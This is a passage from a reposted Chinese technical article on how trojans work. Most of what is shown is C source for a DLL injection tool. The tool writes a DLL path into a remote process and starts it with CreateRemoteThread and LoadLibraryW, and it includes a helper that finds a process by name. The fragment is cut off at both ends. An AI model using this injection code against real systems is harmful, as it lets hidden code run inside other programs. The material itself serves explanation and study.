揭开木马的神秘面纱
作者 佚名技术
来源 程序设计
浏览
发布时间 2012-06-30
| "); //将DLL的路径名复制到远程进程的内存空间 iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); CheckError(iReturnCode, false, "WriteProcessMemory"); //计算LoadLibraryW的入口地址 PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); CheckError((int)pfnStartAddr, NULL, "GetProcAddress"); //启动远程线程,通过远程线程调用用户的DLL文件 hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL); CheckError((int)hRemoteThread, NULL, "Create Remote Thread"); //等待远程线程退出 WaitForSingleObject(hRemoteThread, INFINITE); //清场处理 if (pszLibFileRemote != NULL) VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE); if (hRemoteThread != NULL) CloseHandle(hRemoteThread ); if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess); }//end of main() //将进程名转换为PID的函数 DWORD ProcessToPID(char *InputProcessName) { DWORD aProcesses[1024], cbNeeded, cProcesses; unsigned int i; HANDLE hProcess; HMODULE hMod; char szProcessName[MAX_PATH] = "UnknownProcess"; // 计算目前有多少进程, aProcesses[]用来存放有效的进程PIDs if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) ) return 0; cProcesses = cbNeeded / sizeof(DWORD); // 按有效的PID遍历所有的进程 for ( i = 0; i < cProcesses; i++ ) { // 打开特定PID的进程 hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i]); // 取得特定PID的进程名 if ( hProcess ) { if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) ) { GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName) ); //将取得的进程名与输入的进程名比较,如相同则返回进程PID if(!_stricmp(szProcessName, InputProcessName)){ CloseHandle( hProcess ); return aProcesses[i]; } } }//end of if ( hProcess ) }//end of for //没有找到相应的进程名,返回0 CloseHandle( hProcess ); return 0; }//end of ProcessToPID //错误处理函数CheckError() //如果iReturnCode等于iErrorCode,则输出pErrorMsg并退出 void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg) { if(iReturnCode==iErrorCode) { printf("%s Error:%d\n\n", pErrorMsg, GetLastError()); //清场处理 if (pszLibFileRemote != NULL) VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE); if (hRemoteThread != NULL) CloseHandle(hRemoteThread ); if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess); exit(0); } }//end of CheckError() //使用方法说明函数usage() void usage(char * pErrorMsg) { printf("%s\n\n",pErrorMsg); printf("\t\tRemote Process DLL by Shotgun\n"); printf("\tThis program can inject a DLL into remote process\n"); printf("Email:\n"); printf("\tShotgun@Xici.Net\n"); printf("HomePage:\n"); printf("\thttp://It.Xici.Net\n"); printf("\thttp://www.Patching.Net\n"); printf("USAGE:\n"); printf(&quo |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 软件试用次数的限制下一篇: 《深度探索C++对象模型》读书笔记(5)
关于揭开木马的神秘面纱的所有评论
